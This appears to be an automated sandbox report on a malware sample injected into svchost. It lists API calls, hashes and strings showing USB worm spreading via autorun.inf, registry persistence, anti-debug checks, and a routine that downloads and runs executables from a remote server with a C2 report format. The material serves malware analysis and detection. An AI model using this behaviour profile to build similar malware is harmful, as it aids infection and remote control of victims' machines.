            • Instruction ID: a0318e93728828441751b9b79375662a1b03e81b9d609222f75a0b945b8376d4
            • Opcode Fuzzy Hash: 25d991ee594b92c996d61e6126097692e3d5b1e43fd5b8b39e8d1785e9ab938a
            • Instruction Fuzzy Hash: 96118472900229FBDF60CF89DCC0B9A77A8EF15354B184060ED05DB256D335ED54CAA0
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,001E4B23,00000000,00000001,00000000,00000000,00000000,?,001E4228,00000001,00000214,?,001E4AD9), ref: 001E46FB
              • Part of subcall function 001E3660: __getptd_noexit.LIBCMT ref: 001E3660
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: AllocateHeap__getptd_noexit
            • String ID:
            • API String ID: 328603210-0
            • Opcode ID: 442087e6c3c3495d1c55b8845976543a6c7f19baa29af6a87fc46c721d63f688
            • Instruction ID: 025902a9c07dfae11a62572a58b6260b62c78ca4dc90e5233a57cc36847cfd8e
            • Opcode Fuzzy Hash: 442087e6c3c3495d1c55b8845976543a6c7f19baa29af6a87fc46c721d63f688
            • Instruction Fuzzy Hash: 2D01FC35201A959BEB289F37DC48B6E3384AF86BA0F008569E8168B590EB308C40C680
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • LoadLibraryA.KERNEL32(?,?,?,?), ref: 0008116D
            Memory Dump Source
            • Source File: 00000009.00000002.381464840.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_80000_svchost.jbxd
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 4e4ed2526a693afd537bf01d943d5a8d2f998349fa7a9eea0a5145a2123ba823
            • Instruction ID: e0234c374da8b9b25d2d5619e3029d70313bffc099d0792054f9322e6152414a
            • Opcode Fuzzy Hash: 4e4ed2526a693afd537bf01d943d5a8d2f998349fa7a9eea0a5145a2123ba823
            • Instruction Fuzzy Hash: 2C017172A04219ABEF60DF15DC88BDA77ACFF103A4F198121EE59EB241D730ED1187A0
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 75b8324241d3d0439ea00671a6b8127546a6cfe79488f1b8daba38fea9b6d577
            • Instruction ID: b45fa52f8c40281fa6ad0ebdb6a2ad6170e8a4b756024867c35bdb331d14aa2b
            • Opcode Fuzzy Hash: 75b8324241d3d0439ea00671a6b8127546a6cfe79488f1b8daba38fea9b6d577
            • Instruction Fuzzy Hash: FEF02B611583EB5AD7127F6856065CCEB664B2277C7F88559D941AF443D724C40AC324
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • RtlEncodePointer.NTDLL(00000000,001E837C,001EEF00,00000314,00000000,?,?,?,?,?,001E7A4F,001EEF00,Microsoft Visual C++ Runtime Library,00012010), ref: 001E40C8
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: EncodePointer
            • String ID:
            • API String ID: 2118026453-0
            • Opcode ID: e8b6a717469c442fde92eb478f56aee04da615850206d42d2f74a29996334256
            • Instruction ID: bfccb8bc635d79b1ddfcc264067e6d7c482d0c07bf75be3107ec215038a9957c
            • Opcode Fuzzy Hash: e8b6a717469c442fde92eb478f56aee04da615850206d42d2f74a29996334256
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • wsprintfW.USER32 ref: 001E176E
            • FindFirstFileW.KERNEL32(?,?,756F412B,?,001E121A), ref: 001E1781
            • wsprintfW.USER32 ref: 001E1844
            • wsprintfW.USER32 ref: 001E1859
            • wsprintfW.USER32 ref: 001E187B
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1887
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1899
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E121A), ref: 001E18A6
            • wsprintfW.USER32 ref: 001E1930
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E193C
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E194E
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E195B
            • lstrcmpiW.KERNEL32(?,.LNK,?,?,?,?,001E121A), ref: 001E1988
            • wsprintfW.USER32 ref: 001E19A8
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E19B4
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E19C6
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E19D3
            • lstrcmpiW.KERNEL32(?,.INF,?,?,?,?,001E121A), ref: 001E19FC
            • lstrcmpiW.KERNEL32(?,.INI,?,?,?,?,001E121A), ref: 001E1A2C
            • wsprintfW.USER32 ref: 001E1A8A
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1A96
            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,?,?,001E121A), ref: 001E1AAC
            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1AB9
            • wsprintfW.USER32 ref: 001E1B19
            • SetFileAttributesW.KERNEL32(?,00000006,?,?,?,?,?,?,?,?,001E121A), ref: 001E1B27
            • FindNextFileW.KERNEL32(?,?,?,001E121A), ref: 001E1B3B
            • FindClose.KERNEL32(?,?,?,?,?,?,?,?,?,001E121A), ref: 001E1B4A
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: File$Deletewsprintf$Attributes$Findlstrcmpi$CloseFirstNext
            • String ID: %s%s$%s.exe$%s\%s$%s\*$.INF$.INI$.LNK$.bat$.cmd$.exe$.pif$.vbs$LaunchU3.exe$Thumbs.db$~$W
            • API String ID: 737707242-3294740035
            • Opcode ID: fec512aac4829346cc847915e40b7bb0041c52fc50b8ebfeb63b1a3f234bf72a
            • Instruction ID: a358d29ea60f25bc7e2f667e9cd07f914730b2d6dadc4d570067a6905d58de3d
            • Opcode Fuzzy Hash: fec512aac4829346cc847915e40b7bb0041c52fc50b8ebfeb63b1a3f234bf72a
            • Instruction Fuzzy Hash: F8C1E472900699BACB24DBA1CC44EEE7379FF68750F408695E909A7140F771EBC8CB50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00021535: lstrlen.KERNEL32(00000000), ref: 00021552
              • Part of subcall function 00021535: RtlAllocateHeap.NTDLL(00000000,00000001,00000000), ref: 00021569
              • Part of subcall function 00021535: lstrcpy.KERNEL32(00000000,00000000), ref: 0002158C
              • Part of subcall function 00021535: socket.WS2_32(00000002,00000001,00000006), ref: 00021610
              • Part of subcall function 00021535: connect.WS2_32(?,00000002,00000010), ref: 0002162A
              • Part of subcall function 00021535: RtlAllocateHeap.NTDLL(00000008,00000401,00000002), ref: 00021644
              • Part of subcall function 00021535: wsprintfA.USER32 ref: 0002166B
              • Part of subcall function 00021535: send.WS2_32(?,00000000,00000000,00000000), ref: 00021694
              • Part of subcall function 00021535: send.WS2_32(?,00000000,00000020,00000000), ref: 000216AA
              • Part of subcall function 00021535: recv.WS2_32(?,00000000,00000400,00000002), ref: 000216BC
            • NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 0002291B
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022958
            • GetModuleFileNameW.KERNEL32(00000000,?,00008000,00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022972
            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0002298C
            • GetFileTime.KERNEL32(?,?,?,?,?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00008000,00000000,00008000), ref: 000229A3
            • CloseHandle.KERNEL32(?), ref: 000229AB
            • lstrcpy.KERNEL32(?,?), ref: 000229BF
            • RegOpenKeyExA.ADVAPI32(?,00000000,00020019,?,?,?,?,?,?,?,?,80000000,00000001,00000000,00000003,00000080), ref: 000229D8
            • wsprintfW.USER32 ref: 000229F8
            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00008000), ref: 00022A18
            • RegCloseKey.ADVAPI32(?,00000000,?,?,00000000,00000000,?,00008000), ref: 00022A21
            • ExpandEnvironmentStringsW.KERNEL32(%tmp%\,?,00008000,00000000,?,?,00000000,00000000,?,00008000), ref: 00022A38
            • GetTickCount.KERNEL32(%tmp%\,?,00008000,00000000,?,?,00000000,00000000,?,00008000), ref: 00022A47
            • wsprintfW.USER32 ref: 00022A53
            • CloseHandle.KERNEL32(00000000), ref: 00022A61
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00022A78
            • WriteFile.KERNEL32(?,?,?,00008000,00000000), ref: 00022A9C
            • SetFileTime.KERNEL32(?,?,?,?,?,?,?,00008000,00000000,?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00022AB0
            • CloseHandle.KERNEL32(?), ref: 00022AB8
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00022AE5
            • CloseHandle.KERNEL32(00000000), ref: 00022AF4
            • ResumeThread.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?,?,?,?), ref: 00022AFC
            • CloseHandle.KERNEL32(?), ref: 00022B04
            • CloseHandle.KERNEL32(?), ref: 00022B0C
            • VirtualFree.KERNEL32(?,00000000,00008000,?,40000000,00000000,00000000,00000002,00000006,00000000,00000000,?,?,00000000,00000000,?), ref: 00022B25
            • HeapFree.KERNEL32(00000000,00022DC2,00000000), ref: 00022B35
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Close$FileHandle$CreateHeapwsprintf$AllocateFreeTimeVirtuallstrcpysend$AllocCountDelayEnvironmentExecutionExpandModuleNameOpenProcessQueryResumeStringsThreadTickValueWriteconnectlstrlenrecvsocket
            • String ID: %08x.exe$%lu$%tmp%\$D
            • API String ID: 2201620439-1581451172
            • Opcode ID: 1ead3e0e0c4784b2e39803a329a854da72fce99b689297478ee766f0d55feeb3
            • Instruction ID: cf74aea69abc5c0a2de0252094b142b6ca5f53f96e84daba7efb3699e1ff795d
            • Opcode Fuzzy Hash: 1ead3e0e0c4784b2e39803a329a854da72fce99b689297478ee766f0d55feeb3
            • Instruction Fuzzy Hash: C3616171940229FAEF21AFD0ED42FEEBB79FF04700F204165B614B90E2DBB55A549B14
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 0002243B
            • GetTickCount.KERNEL32(?,00000000,00000000,00000001,?), ref: 0002246A
            • wsprintfW.USER32 ref: 0002247C
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,00000000,00000001,?), ref: 00022492
            • ExpandEnvironmentStringsW.KERNEL32(%allusersprofile%\,?,00008000,00000000,00008000,00001000,00000004,00000000,00000001,?), ref: 000224AF
            • SetCurrentDirectoryW.KERNEL32(?,%allusersprofile%\,?,00008000,00000000,00008000,00001000,00000004,00000000,00000001,?), ref: 000224B7
            • lstrcatW.KERNEL32(?,?), ref: 000224C3
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 000224DA
            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000224FE
            • CloseHandle.KERNEL32(?), ref: 00022506
            • LoadLibraryW.KERNEL32(?), ref: 0002250F
            • GetProcAddress.KERNEL32(?,00000000,?,?,?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00022527
            • FreeLibrary.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000,?,40000000,00000000,00000000,00000002,00000006), ref: 00022533
            • wsprintfA.USER32 ref: 0002254B
            • lstrcpy.KERNEL32(?,software\microsoft), ref: 0002255D
            • RegOpenKeyExA.ADVAPI32(?,00000000,00020006,?,?,software\microsoft,00008000,00001000,00000004,00000000,00000001,?), ref: 00022576
            • lstrlen.KERNEL32(00000000,?,00000000,00020006,?,?,software\microsoft,00008000,00001000,00000004,00000000,00000001,?), ref: 00022590
            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,000203C7,00000001,?,00000000,00020006,?,?,software\microsoft,00008000,00001000,00000004,00000000), ref: 000225A5
            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000001,000203C7,00000001,?,00000000,00020006,?,?,software\microsoft,00008000,00001000,00000004), ref: 000225B8
            • GetSystemDirectoryW.KERNEL32(?,00008000), ref: 000225C5
            • SetCurrentDirectoryW.KERNEL32(?,?,00008000,?,40000000,00000000,00000000,00000002,00000006,00000000,?,%allusersprofile%\,?,00008000,00000000,00008000), ref: 000225CD
            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00008000,?,40000000,00000000,00000000,00000002,00000006,00000000,?,%allusersprofile%\,?), ref: 000225DC
            • HeapFree.KERNEL32(00000000,?,00000000), ref: 000225EC
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: DirectoryFree$CloseCurrentFileLibraryVirtualwsprintf$AddressAllocCountCreateDelayEnvironmentExecutionExpandHandleHeapLoadOpenProcStringsSystemTickValueWritelstrcatlstrcpylstrlen
            • String ID: %allusersprofile%\$ms%08X.dat$ms%08X.dat$software\microsoft
            • API String ID: 2256298638-91618351
            • Opcode ID: c9d5c12deb963359a54036b078a3b5927ef3408201523df2f3d861e7edd93e86
            • Instruction ID: 8d505b397fdd412efd8254c59b3839057c77ae7ec9457711c48ca49aa367cb38
            • Opcode Fuzzy Hash: c9d5c12deb963359a54036b078a3b5927ef3408201523df2f3d861e7edd93e86
            • Instruction Fuzzy Hash: 5A515270D50238BAEF61ABE0FD52FEDBAB9AF04714F108034FA107A1E2D7B599519B50
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • _memset.LIBCMT ref: 001E2A21
            • UnregisterDeviceNotification.USER32 ref: 001E2A6C
            • CloseHandle.KERNEL32(?), ref: 001E2A81
            • UnregisterDeviceNotification.USER32 ref: 001E2A9D
            • CloseHandle.KERNEL32(?), ref: 001E2AB2
            • wsprintfW.USER32 ref: 001E2B00
            • GetDriveTypeW.KERNEL32(?), ref: 001E2B10
            • GetDriveTypeW.KERNEL32(?), ref: 001E2B1C
            • wsprintfW.USER32 ref: 001E2B36
            • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000006,00000000), ref: 001E2B56
            • RegisterDeviceNotificationW.USER32 ref: 001E2BC2
            • Sleep.KERNEL32(00000000), ref: 001E2BD3
            • DefWindowProcW.USER32(?,?,?,?), ref: 001E2BE7
            • UnregisterDeviceNotification.USER32 ref: 001E2C05
            • CloseHandle.KERNEL32(?), ref: 001E2C0C
            • PostQuitMessage.USER32 ref: 001E2C14
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: DeviceNotification$CloseHandleUnregister$DriveTypewsprintf$CreateFileMessagePostProcQuitRegisterSleepWindow_memset
            • String ID: %c:\$%sautorun.inf$,
            • API String ID: 1181696527-3149172787
            • Opcode ID: 3367b166259b102e33d136c77fcb0e016d0473c88841af36f697ecafa1e6476d
            • Instruction ID: 35aff73c0f7ca3073849c40462604c70eb418a00874650ea8877a3aa9de7c2c2
            • Opcode Fuzzy Hash: 3367b166259b102e33d136c77fcb0e016d0473c88841af36f697ecafa1e6476d
            • Instruction Fuzzy Hash: E35149715047859FC320DFA9DC99A6FB7E8BB88710F004A2DF996C7690E731D944CB52
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: wsprintf$File$Find$Move$CloseFirstNext
            • String ID: %s\%s$%s\*$LaunchU3.exe$Thumbs.db$autorun.inf$desktop.ini
            • API String ID: 1843404858-2655799986
            • Opcode ID: ab32bf8fabbe7d9597738632f04ac3e8965f54e1f8576f1a3d3eaf0689f9a5ba
            • Instruction ID: 906cb91f4e5cc51432071a64cb1321b662a276caff4dec06c5186d9bd6d15037
            • Opcode Fuzzy Hash: ab32bf8fabbe7d9597738632f04ac3e8965f54e1f8576f1a3d3eaf0689f9a5ba
            • Instruction Fuzzy Hash: 58813371500985AADB20EB62CC41AFE737EBF34760F8906A4E92697190F332EF85C640
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00021535: lstrlen.KERNEL32(00000000), ref: 00021552
              • Part of subcall function 00021535: RtlAllocateHeap.NTDLL(00000000,00000001,00000000), ref: 00021569
              • Part of subcall function 00021535: lstrcpy.KERNEL32(00000000,00000000), ref: 0002158C
              • Part of subcall function 00021535: socket.WS2_32(00000002,00000001,00000006), ref: 00021610
              • Part of subcall function 00021535: connect.WS2_32(?,00000002,00000010), ref: 0002162A
              • Part of subcall function 00021535: RtlAllocateHeap.NTDLL(00000008,00000401,00000002), ref: 00021644
              • Part of subcall function 00021535: wsprintfA.USER32 ref: 0002166B
              • Part of subcall function 00021535: send.WS2_32(?,00000000,00000000,00000000), ref: 00021694
              • Part of subcall function 00021535: send.WS2_32(?,00000000,00000020,00000000), ref: 000216AA
              • Part of subcall function 00021535: recv.WS2_32(?,00000000,00000400,00000002), ref: 000216BC
            • NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00022B90
            • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022BCD
            • ExpandEnvironmentStringsW.KERNEL32(%tmp%\,?,00008000,00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022BEA
            • GetTickCount.KERNEL32(%tmp%\,?,00008000,00000000,00008000,00001000,00000004,?,00000000,00000000,00000001), ref: 00022BF9
            • wsprintfW.USER32 ref: 00022C05
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000006,00000000), ref: 00022C1F
            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00022C3F
            • CloseHandle.KERNEL32(?), ref: 00022C47
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00022C73
            • CloseHandle.KERNEL32(?), ref: 00022C7F
            • CloseHandle.KERNEL32(?), ref: 00022C87
            • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001), ref: 00022C9D
            • HeapFree.KERNEL32(00000000,?,00000000), ref: 00022CAD
            Strings
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: CloseHandleHeap$AllocateCreateFileFreeVirtualsendwsprintf$AllocCountDelayEnvironmentExecutionExpandProcessStringsTickWriteconnectlstrcpylstrlenrecvsocket
            • String ID: %08x.exe$%tmp%\$D
            • API String ID: 4146496662-4221817291
            • Opcode ID: b8adfce02eb7df874292e9fff201d095f24c3800ae23e2d159d7e0337afc0749
            • Instruction ID: 5885b649af8c529f80e8f4598fd1534c47060ca609640f73fa911d5f00115102
            • Opcode Fuzzy Hash: b8adfce02eb7df874292e9fff201d095f24c3800ae23e2d159d7e0337afc0749
            • Instruction Fuzzy Hash: AE414170900329BAEF61AFE0ED02FEEBAB5BF00710F204164B6117A1E2DBB55A54DB54
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • NtDelayExecution.NTDLL(00000000,FA0A1F00), ref: 00022D62
            • HeapFree.KERNEL32(00000000,?,00000004), ref: 00022D8F
              • Part of subcall function 00021CE9: VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00021D04
              • Part of subcall function 00021CE9: lstrcpy.KERNEL32(?,software\microsoft), ref: 00021D1C
              • Part of subcall function 00021CE9: RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,software\microsoft,00000000,00008000,00001000,00000004), ref: 00021D3A
              • Part of subcall function 00021CE9: RegEnumValueW.ADVAPI32(?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00021D5B
              • Part of subcall function 00021CE9: RegDeleteValueW.ADVAPI32(?,?,?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000), ref: 00021D71
              • Part of subcall function 00021CE9: RegCloseKey.ADVAPI32(?,?,00000000,?,00008000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021D7B
              • Part of subcall function 00021CE9: lstrcpy.KERNEL32(?,?), ref: 00021D89
              • Part of subcall function 00021CE9: RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000,0002001F,00000000,?), ref: 00021DA7
              • Part of subcall function 00021CE9: ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(D:(A;;KA;;;WD),00000001,00022D23,00000000), ref: 00021DC1
              • Part of subcall function 00021CE9: RegSetKeySecurity.ADVAPI32(?,00000004,00022D23,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000,00000000), ref: 00021DCE
              • Part of subcall function 00021CE9: RegCloseKey.ADVAPI32(?,?,00000004,00022D23,?,00000000,00000000,00000000,00040000,00000000,?,00000000,?,?,00000000,00000000), ref: 00021DD6
              • Part of subcall function 00021CE9: RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,0002001F,00000000,?,00000000,?,?,00000004,00022D23,?,00000000,00000000,00000000), ref: 00021DF4
            • RtlAllocateHeap.NTDLL(00000000,00000100,?), ref: 00022DD7
            • wsprintfA.USER32 ref: 00022DF3
            • RtlAllocateHeap.NTDLL(00000000,00000000,00020454), ref: 00022E1B
            • lstrlen.KERNEL32(?,?,?,00000001,00000000,00000000,00020454,00000020,?,00000001,00000100,?,?,?,?), ref: 00022E38
            • HeapFree.KERNEL32(00000000,?,?), ref: 00022E59
            • HeapFree.KERNEL32(00000000,?,00000000), ref: 00022E69
            • ExitProcess.KERNEL32(00000000,00000000,?,00000000,00000000,00020454,00000020,?,00000001,00000100,?,?,?,?), ref: 00022E76
            Strings
            • id:%lu|tid:%lu|result:%lu, xrefs: 00022DEB
            Memory Dump Source
            • Source File: 00000009.00000002.381446071.0000000000020000.00000040.00001000.00020000.00000000.sdmp, Offset: 00020000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_20000_svchost.jbxd
            Similarity
            • API ID: Heap$CreateFreeSecurity$AllocateCloseDescriptorValuelstrcpy$AllocConvertDelayDeleteEnumExecutionExitProcessStringVirtuallstrlenwsprintf
            • String ID: id:%lu|tid:%lu|result:%lu
            • API String ID: 363709119-2667831514
            • Opcode ID: d25e3c9916497819a3f6f360782b5fd7bcca9f923f3f8a78d58072fed458c023
            • Instruction ID: 4d733a3a282c010e36a280ad8aa10931b2d313d0ec136ca377ee90bd45d2e22f
            • Opcode Fuzzy Hash: d25e3c9916497819a3f6f360782b5fd7bcca9f923f3f8a78d58072fed458c023
            • Instruction Fuzzy Hash: 8151077180022AFEDF61AFE4EC46BEEBBB5BF14300F104066F611750A2D7798A50EB65
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • FindFirstFileW.KERNEL32(?,?,750BF119,?,?), ref: 001E1C31
            • FindNextFileW.KERNEL32(00000000,?,?,?), ref: 001E1C78
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: FileFind$FirstNext
            • String ID:
            • API String ID: 1690352074-0
            • Opcode ID: 86d5251667b6a28160473c7bbb115f2062870121a3a4e44fd48f104b4d4e0cb6
            • Instruction ID: 2229d15873242f85dfec415792582947ea867989e2e1e2ca5ddd33cc57e2dda0
            • Opcode Fuzzy Hash: 86d5251667b6a28160473c7bbb115f2062870121a3a4e44fd48f104b4d4e0cb6
            • Instruction Fuzzy Hash: BD8114319005599BCB24AFA9CC457FE73B6FFA4360F5446A4ED0ACB290E7319E91CB90
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 001E3439
            • SetUnhandledExceptionFilter.KERNEL32 ref: 001E344E
            • UnhandledExceptionFilter.KERNEL32(001E9250), ref: 001E3459
            • GetCurrentProcess.KERNEL32(C0000409), ref: 001E3475
            • TerminateProcess.KERNEL32(00000000), ref: 001E347C
            Memory Dump Source
            • Source File: 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001E0000, based on PE: true
            • Associated: 00000009.00000002.381475492.00000000001F1000.00000040.00001000.00020000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_1e0000_svchost.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            • Opcode ID: faab27382bc7f5e2fac9fdfdb669a130c37e001037dc33a816f8df33481041fd
            • Instruction ID: 8f6d5e5780a839239a139e646b0f7ae7d87f2c225a55ac15a0e385b5a3efd011
            • Opcode Fuzzy Hash: faab27382bc7f5e2fac9fdfdb669a130c37e001037dc33a816f8df33481041fd
            • Instruction Fuzzy Hash: 2121BCB4802290DBDB90DFE5EDC5A5C3BE8BB48318F50441AF5098FA72E77569C0CB45
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • wsprintfW.USER32 ref: 001E2571
            • DeleteFileW.KERNEL32(?), ref: 001E2583
            • SetFileAttributesW.KERNEL32(?,00000080), ref: 001E2595
            • DeleteFileW.KERNEL32(?), ref: 001E25A2
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000007,00000000), ref: 001E25BA
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 001E25D4
            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 001E25E2
            • CloseHandle.KERNEL32(00000000), ref: 001E25E9
            • RegQueryValueExW.ADVAPI32 ref: 001E2618
            • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 001E2631
            • RegQueryValueExW.ADVAPI32(?,DOS_STUB,00000000,00000000,00000000,00000000), ref: 001E2659
            • _rand.LIBCMT ref: 001E2539
              • Part of subcall function 001E2F58: __getptd.LIBCMT ref: 001E2F58
            • _rand.LIBCMT ref: 001E2685
            • VirtualAlloc.KERNEL32(00000000,00000001,00001000,00000004), ref: 001E26A6
            • _memset.LIBCMT ref: 001E26B9
            • wsprintfW.USER32 ref: 001E26D4
            • DeleteFileW.KERNEL32(?), ref: 001E26E6
            • SetFileAttributesW.KERNEL32(?,00000080), ref: 001E26F8
            • DeleteFileW.KERNEL32(?), ref: 001E2705
            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000007,00000000), ref: 001E271D
            • WriteFile.KERNEL32(00000000,?,00000001,?,00000000), ref: 001E2737
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 001E274F
